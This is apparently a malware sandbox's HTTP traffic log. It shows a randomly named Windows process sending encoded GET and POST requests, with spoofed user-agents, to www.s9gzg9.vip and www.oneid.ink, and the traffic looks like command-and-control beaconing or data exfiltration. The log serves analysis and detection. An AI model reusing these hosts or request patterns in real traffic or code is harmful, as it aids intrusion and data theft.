                                                                                Data Ascii: Y8i=UjrhHaQBT317VYw1PWO30+WJ06hXAGMYi1Zr+Af+6D6lBLvDQ2ZfwoSVWTGACC6bDV/bVUXLOh1/qRESEshzipZVRDIEwRpA/MqVJaKrRf/Os8aHas+XS8OMT5P8UuR1sl08E1OB9Nb8evoDEGyWrGKudhXop16E5kETD3wm4hrW5fmHX5Wjnzjx6mFHd4cGShDJeFHuE0BAZfE8to3wDIFMsuAGRpfTFwN0fMmIG0Kuhkr967J5LRoRuPHff3FvWUdU1JF5hgvIIbzTIYbJudW3euvHy5n17YQPRV/oZxJxHaj2NcuDJPyMXNOPImwBYnso8mHRDl5vuy39Nt9XwDKLklDZboMS87iP1FQGKN6dt8XVMoIrorOQFTHsXWxKqGQ8x7up6bZaO3+I/8pLavNS0S4FPFBjf3XHfeHiLDDpXRUTgPRdvLVQHICTMHt4do2cBTD8L8DGhPGOhHK+Axr3+TU7B7+l+KZ7Fr3SpD/YxUD+/OJ2He2R49RaVeywIqYYNjFOFCPqjUeQQ+BSsQpq1x9/Iz35UEDEwYY6Hw59L1Y79WNTcEdws2tIHQne1QnCw1Jpv9/cueO2RHTKT4cJvPS+5d81Uv2UQUCUqvf4fbYDPQrS7P1gnqs6doE5bLxxewnUmnQHYZ8yFhadpdioQn/5ts/a5ZX+3VAYc+qmTYzCOY5BCoLxaI49l8Jo6yIjpkRccr8Dd45n12ieFm/kdarVunVwk57/ImEUJjhpziMjzetaYsa5idcrQSlxJIAwMu3/3BF0Nkay3S9B4Do35P2yh21KrTbVsNxF1QNJv90qDfCbAf5CGwlhU0b1Yf2GQ/H8pFEwamv2ms8TXkNISk1APRYwCx1o/AIJw54wePrNpbLOXgZexUdOkUsnd1jQpGeRcN+3uXfBbgfjzFj+vQMf+Nt1nFV8wMTNNKU5++h48IWp+VBJMYGKQldIdKQhGEvjyjRAc2ayHoO1PW3ClV6sD9Um891Cem+2w6YwvKCA [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.4500443.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:14.281449080 CET499OUTGET /5hlj/?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.s9gzg9.vip
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:14.909862041 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 68 44 42 45 74 46 59 63 47 4e 47 63 72 67 41 41 47 61 7a 34 63 6d 75 73 34 64 78 50 31 30 35 79 6d 31 62 32 7a 33 62 39 78 69 59 52 50 76 47 66 45 31 49 31 63 61 76 51 45 57 64 47 78 79 53 57 31 66 65 46 47 48 4a 56 43 70 4c 37 42 45 2f 44 38 6b 55 76 59 39 62 52 6a 4a 7a 78 51 38 42 6e 74 50 6a 50 63 79 53 55 73 37 73 67 49 43 73 55 2f 75 4d 56 38 51 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.450045172.217.18.19803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:19.984545946 CET751OUTPOST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4d 68 6d 61 4b 75 69 37 48 57 72 35 77 54 75 38 63 50 2b 76 55 32 6b 2b 42 68 38 66 4e 58 7a 78 42 58 36 33 4b 73 35 51 62 36 4d 34 78 5a 78 42 46 48 4c 7a 5a 49 54 42 4c 48 6b 30 41 46 4a 67 56 70 4f 41 62 38 76 30 4e 7a 70 2b 2b 67 74 34 46 57 39 79 34 4b 37 33 41 33 54 70 39 73 37 31 45 67 46 7a 59 44 39 72 67 74 77 75 4a 4d 45 38 59 72 6f 65 38 64 47 5a 36 4e 62 4a 44 6f 65 37 34 38 6a 59 36 53 43 61 5a 71 75 49 76 73 31 58 79 47 68 52 54 52 6b 4c 74 36 6f 72 45 2b 76 36 58 49 7a 30 2b 6d 4a 47 64 54 38 69 55 34 4d 73 77 56 71 53 54 41 3d 3d
                                                                                Data Ascii: Y8i=Fs5kq5KEODJPMhmaKui7HWr5wTu8cP+vU2k+Bh8fNXzxBX63Ks5Qb6M4xZxBFHLzZITBLHk0AFJgVpOAb8v0Nzp++gt4FW9y4K73A3Tp9s71EgFzYD9rgtwuJME8Yroe8dGZ6NbJDoe748jY6SCaZquIvs1XyGhRTRkLt6orE+v6XIz0+mJGdT8iU4MswVqSTA==
                                                                                Nov 17, 2024 08:38:21.128840923 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:20 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:20 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: cfed3c6c73063ad54a3f06fe750ce9a8
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                Nov 17, 2024 08:38:21.128887892 CET1236INData Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                Nov 17, 2024 08:38:21.128973007 CET424INData Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                Nov 17, 2024 08:38:21.129053116 CET491INData Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                Nov 17, 2024 08:38:21.129084110 CET20INData Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0
                                                                                Nov 17, 2024 08:38:21.129113913 CET20INData Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.450046172.217.18.19803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:22.534073114 CET771OUTPOST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4e 43 2b 61 47 70 2b 37 41 32 72 36 70 6a 75 38 53 76 2b 56 55 32 67 2b 42 6b 51 50 4f 68 6a 78 50 58 4b 33 45 4a 4e 51 63 36 4d 34 36 35 78 45 4c 6e 4c 47 5a 49 58 6e 4c 46 77 30 41 42 68 67 56 6f 2b 41 63 4c 37 33 4c 6a 70 38 72 51 74 32 62 6d 39 79 34 4b 37 33 41 33 48 44 39 73 54 31 45 7a 4e 7a 5a 69 39 6f 74 4e 77 68 65 38 45 38 50 62 6f 61 38 64 47 33 36 49 36 53 44 71 57 37 34 38 54 59 2b 58 75 5a 44 36 75 4b 79 63 30 51 6a 31 77 42 5a 44 78 6f 73 71 6f 50 45 4e 62 72 62 75 69 75 76 58 6f 52 50 54 59 52 4a 2f 46 59 39 57 58 62 49 4d 68 64 55 39 66 46 49 6d 45 47 39 6b 79 32 4a 55 59 38 79 76 4d 3d
                                                                                Data Ascii: Y8i=Fs5kq5KEODJPNC+aGp+7A2r6pju8Sv+VU2g+BkQPOhjxPXK3EJNQc6M465xELnLGZIXnLFw0ABhgVo+AcL73Ljp8rQt2bm9y4K73A3HD9sT1EzNzZi9otNwhe8E8Pboa8dG36I6SDqW748TY+XuZD6uKyc0Qj1wBZDxosqoPENbrbuiuvXoRPTYRJ/FY9WXbIMhdU9fFImEG9ky2JUY8yvM=
                                                                                Nov 17, 2024 08:38:23.500629902 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:23 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:23 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: c77d8c98ad2add2d9dd5daaf40b0ee41
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                Nov 17, 2024 08:38:23.500679016 CET1236INData Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                Nov 17, 2024 08:38:23.500718117 CET424INData Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                Nov 17, 2024 08:38:23.501382113 CET491INData Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                Nov 17, 2024 08:38:23.502506971 CET20INData Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.450047172.217.18.19803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:25.085782051 CET10853OUTPOST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4e 43 2b 61 47 70 2b 37 41 32 72 36 70 6a 75 38 53 76 2b 56 55 32 67 2b 42 6b 51 50 4f 68 72 78 50 6d 71 33 45 75 52 51 64 36 4d 34 6d 4a 78 46 4c 6e 4c 68 5a 4d 44 72 4c 46 38 6b 41 48 6c 67 61 71 32 41 64 2f 58 33 43 6a 70 38 30 41 74 37 46 57 39 6e 34 4b 72 7a 41 33 58 44 39 73 54 31 45 79 39 7a 51 54 39 6f 2b 64 77 75 4a 4d 45 37 59 72 6f 69 38 64 65 42 36 49 2f 6e 43 61 32 37 34 63 44 59 38 46 32 5a 49 36 75 4d 78 63 30 79 6a 31 39 62 5a 44 74 65 73 70 30 78 45 4b 7a 72 4e 4b 6e 52 38 45 59 64 65 41 74 44 4b 4d 39 75 37 6d 54 31 41 65 4a 62 56 34 2f 51 54 33 59 4b 6c 32 66 75 64 30 74 37 76 72 7a 59 31 71 32 30 54 36 66 68 74 72 30 66 31 77 51 68 6d 73 61 35 76 57 32 34 68 32 72 58 33 4a 71 35 31 41 77 2f 35 39 6e 42 4f 34 43 5a 57 35 34 33 5a 42 47 77 4b 71 6f 41 65 69 78 4f 76 41 59 31 38 74 58 78 64 59 4c 4f 48 46 64 55 6d 51 49 78 77 58 35 50 61 36 55 6e 71 59 33 56 79 36 65 7a 53 70 4b 41 46 68 66 48 38 66 52 71 70 34 6a 30 45 4a 38 37 32 4d [TRUNCATED]
                                                                                Data Ascii: Y8i=Fs5kq5KEODJPNC+aGp+7A2r6pju8Sv+VU2g+BkQPOhrxPmq3EuRQd6M4mJxFLnLhZMDrLF8kAHlgaq2Ad/X3Cjp80At7FW9n4KrzA3XD9sT1Ey9zQT9o+dwuJME7Yroi8deB6I/nCa274cDY8F2ZI6uMxc0yj19bZDtesp0xEKzrNKnR8EYdeAtDKM9u7mT1AeJbV4/QT3YKl2fud0t7vrzY1q20T6fhtr0f1wQhmsa5vW24h2rX3Jq51Aw/59nBO4CZW543ZBGwKqoAeixOvAY18tXxdYLOHFdUmQIxwX5Pa6UnqY3Vy6ezSpKAFhfH8fRqp4j0EJ872Mw4sfy4YHsUspqKnYMhK9gntqYtjkLQZWEZcSSgVZnxzxIs3tv4yppGI74vGjqKG3cXxT+NB8vvYINFNBhXz8QJppKk6uJM5NEAQwwp53BAA9ZCpCUxKg1ekp6bqe5eNawfP3L8iqI4H6Aq8Eck7GSE2ZQRHuhwzoMHvrtkbpvW/8ZhhF/o6GTKeB7babDCLsL5grdtX1iYx7nRrAFmpOloV8PbcTfUYO4QCQ1Ja/dqUJ2vGE6+tKapnPpArmGA1uRqibtWa0dtjrgKByK/rZByrJO5UcR7JWwSR0wKAVRwCl6eij1byjdmmHIjFyKQZARSIk2POYQYarFM6lJWnLG6dJdrlUmm12cCV62rsZwsvZFXLrCXctJU01cqGc5bPMpddOglm83Mr+5k8gaSB5CxplMzfDlLBh9LMzOJvmt0SKA3+vj9suV3a+tC71H2asiecOMdbWylQe8BDpT3BHABn70xKE4XNHjxUvpFgk9otunSEhW/CCDGQ5byp4XvCdzmf/jn5MZGn8X8skv0YP4TVHi6mSvtGEE0hCFQ9HTf7qe2V6N8NdJ0Kg2JcnJ2z2zd8TyvwwKS0Jkymbx2QM06V/DpI8US3TUfXsjIrw5zX1OYUwXlMFlwtMD2O1OIW2QHa52qdeHxMMqhDm7ssw/VuCY9up8g7eqd [TRUNCATED]
                                                                                Nov 17, 2024 08:38:26.047517061 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:25 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:25 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: d821900188642a3441d611d65a140424
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                Nov 17, 2024 08:38:26.047569036 CET1236INData Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                Nov 17, 2024 08:38:26.047609091 CET424INData Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                Nov 17, 2024 08:38:26.047707081 CET491INData Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
